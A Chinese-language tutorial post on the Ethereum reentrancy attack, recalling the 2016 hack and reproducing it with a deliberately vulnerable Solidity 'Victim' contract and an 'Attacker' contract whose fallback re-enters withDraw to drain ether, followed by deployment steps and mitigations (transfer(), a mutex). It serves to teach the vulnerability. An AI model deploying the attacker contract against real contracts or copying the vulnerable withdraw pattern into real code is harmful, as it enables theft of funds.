以太坊攻击——重入攻击

2016年6月17日，以太坊遭遇了有史以来最大的一场黑客攻击，受到威胁的金额将近占当时以太坊总量的14%，为了解决这个问题，以太坊社区被迫进行以太坊硬分叉，分成了以太经典（未分叉）和以太坊（硬分叉）两个社区。而事件背后的罪魁祸首就是本文的中心——重入攻击（Reentry Attack）。本文将使用一个简单的案例来重现重入攻击。

攻击原理

本文用以下Solidity代码来举例：

pragma solidity ^0.4.26;
 
contract Victim {
    mapping(address => uint) public userBalannce;
    uint public amount = 0;
    function Victim() payable{}
    function withDraw(){
        uint amount = userBalannce[msg.sender];
        if(amount > 0){
            msg.sender.call.value(amount)();
            userBalannce[msg.sender] = 0;
        }
    }
    function() payable{}
    function receiveEther() payable{
        if(msg.value > 0){
            userBalannce[msg.sender] += msg.value;
        }
    }
     function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
}
 
contract Attacker{
    uint public amount = 0;
    uint public test = 0;
    function Attacker() payable{}
    function() payable{
        test++;
        Victim(msg.sender).withDraw();
    }
    function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
    function sendMoney(address addr){
        Victim(addr).receiveEther.value(1 ether)();
    }
    function reentry(address addr){
        Victim(addr).withDraw();
    }
}

该攻击出现的原因是在victim合约中的withdraw函数使用了call()方法，call()方法调用完之后，由于找不到对应的方法签名，会默认调用fallback()函数。在本例中，attacker在调用完call()方法之后，接下来并不是执行userBalannce[msg.sender] = 0; 而是Attacker收到了Ether后，调用了回调函数，在回调函数中，又重新调用了Victim的withdraw。因此形成了一个循环，直至Victim中的Ether被清0.

攻击实现

首先由钱包1创建victim合约，并向victim合约中充值1ETH，接着由钱包2创建attacker合约，并向attacker合约中充值0.1ETH。接着通过钱包2调用attacker合约向victim合约充值0.1ETH，最后调用Reentry函数，将victim中的ETH全部转到attacker合约中。

防护措施

（1） 使用transfer()函数：由于transfer转账功能只能发送2300gas不足以使目的地址/合约调用另外一份合约（即重入发送合约）；

（2） 引入互斥锁。也就是说，要添加一个在代码执行过程中锁定合约的状态变量，阻止重入调用。

欢迎关注我的个人推特：https://twitter.com/kongtaoxing